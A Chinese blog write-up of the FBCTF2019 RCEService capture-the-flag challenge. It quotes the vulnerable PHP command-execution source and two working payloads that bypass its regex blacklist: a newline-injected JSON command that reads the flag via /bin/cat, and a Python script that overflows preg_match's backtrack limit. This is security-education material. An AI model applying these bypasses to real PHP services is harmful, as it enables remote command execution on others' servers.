[FBCTF2019]RCEService

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量266 收藏 1
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/125019111
版权

知识点:调用cat命令在/bin/cat下 ,json格式,换行染过正则。数据溢出绕过正则。

 

题目让我门输入 JSON格式。根据题目是RCE,所以输入下{“cmd”:"ls"}查看一下当前目录下的文件 注意:json是 以键值对的形式存在的。

回显。index.php

cat 查看一下index。php内容:

被过滤掉了 。没有思路了 ,看一下别人wp

看到别人的找到的源代码

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];

    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}

?>

发现他的正则匹配 是以 .*来匹配变量json(也就是我们输入的值)的前后结束。那么我们可以使用%0a来进行绕过。   

flag存在/home/rceservice/目录下

 

putenv('PATH=/home/rceservice/jail');// 设置了环境变量,只能使用当前环境的命令

既然有环境限制,那么我们想要查看 flag 必须使用cat ,则 /bin/cat调用cat命令。构造pyload:

{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0a} 

得到flag。

还有一种方法,就是用preg_match的回溯限制,长度为一百万,来绕过preg_match,因为当preg_match匹配的字符串太长的时候就会返回1,也就是数据溢出(不知道理解对不对)。

构造pyload:

import requests
url = 'http://879f19e5-f850-4bf5-a4fb-bea23ce10945.node4.buuoj.cn:81/'
payload = {
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","succ3":"'+'a'*1000000+'"}'
}
r = requests.post(url=url,data=payload)
print(r.text)

get传参是由长度限制,各个浏览器都不同,但肯定没有一百万,所以我们要用post提交

关于这块内容可以看:超回溯上限绕过

snowlyzz
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[FBCTF2019]RCEService 1
plant1234的博客
09-30 728
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
[FBCTF2019]RCEService1
alwtj的博客
06-23 449
开始代码审计~配置了一个环境变量,所以我们输入系统命令的时候需要找到它的绝对路径比如/bin/cat .2. is_string() 说明我们传入的value,必须是字符型.3. preg_math(),我们需要绕过这个正则表达式,不过它真的好长.4. json_decode(),说明我们传入的格式为json格式.5. system(),我们可以通过传入系统命令来找出flag值.我们开始进行绕过preg_math()~我们可以通过两种姿势来绕过~
BUU [FBCTF2019]RCEService
Jay17的博客
03-13 538
BUU [FBCTF2019]RCEService
[FBCTF2019]RCEService_WP
Accompany的博客
01-30 308
分析 文章目录分析源码题解 Enter command as JSON: 这便是打开页面的提示了,需要提交命令以JSON的形式,所以在这里先了解一下JSON是什么 了解于此 简单来说形式如下:{名称:值} 检验成功,下来便是通过命令执行获取flag了 接着其实是想cat源码看一看,毕竟一个RCE肯定会有许多过滤,但不管怎样cat,以见过的绕过方式去尝试都是没有回显的,便去看了各位师傅的wp,都说是网上搜的源码,咱也不明白咋来的,就直接奉上吧 源码 <?php putenv('PATH=/ho
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia
weixin_44016181的博客
10-11 206
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia,BUU两道web练习题的WP。
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 655
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-05
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
NetScream(网络加速软件) v1.8.4.2014 官方正式版.zip
07-15
NetScream是一款优化你的modem连接速率的工具。NetScream能提高你的internet连接速度,NetScream官方正式版是目前市场上最佳的modem优化工具之一,能极好地提高你的modem的下载/上传速度。它非常易于使用,完全兼容...
图片滚动加载
07-12
图片滚动加载,也被称为“图片懒加载”或“延迟加载”,是现代网页设计中一个重要的优化技术。这种技术主要用于提高网页的加载速度和用户体验,尤其是在处理大量图片的页面时。在传统的网页设计中,所有图片都会在...
feedblitz汉化操作平台
07-22
【feedblitz汉化操作平台】是一个专为中文用户设计的平台,旨在简化Feedblitz服务的使用,使其更加友好和易懂。Feedblitz是一款强大的邮件订阅和自动化营销工具,它允许用户管理电子邮件订阅、发布RSS feed更新,并...
cromos:Cromos是用于下载Chrome网上应用店的合法扩展并将代码插入应用程序后台的工具
01-28
$ git clone https://github.com/fbctf/cromos $ sudo chmod -R 777 cromos/ $ cd cromos && python setup.py 用法 下载扩展 Usage: python cromos.py --extension {id} 下载扩展和加载模块 Usage: python cromos.py...
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
OWASP果汁商店CTF扩展 Node包可以帮助您准备针对不同流行CTF框架的挑战的事件... ctfFramework : CTFd | FBCTF | RootTheBox juiceShopUrl : https://juice-shop.herokuapp.com ctfKey : https://raw.githubusercon
这款ERP云进销存系统,直接封神
魔法标记
07-29 431
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 157
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 777
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
跨境电商独立站:Shopify/Wordpress/店匠选哪个?
dongdonglin77的博客
07-26 920
商家需要根据自己的资源、能力和市场定位,选择最适合自己的建站工具,并制定有效的运营计划。通过持续的市场调研、品牌建设、流量获取和客户服务,商家可以在独立站的道路上实现可持续发展。
PHP表单必需字段
红客网络编程与渗透技术
07-28 188
PHP中处理表单时,确保必填字段被正确填写是非常重要的。这通常涉及到在客户端(使用HTML5)和服务器端(使用PHP)进行验证。以下是一个关于PHP表单必需字段的详细教程,包括如何在客户端和服务器端进行验证。
开源的CTF比赛平台有那些
03-25
3. FBCTF (https://github.com/facebook/fbctf) 4. RootTheBox (https://github.com/moloch--/RootTheBox) 5. HackTheBox platform (https://github.com/HackTheBox/htb-frontend) 6. Metasploitable 3 CTF platform...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值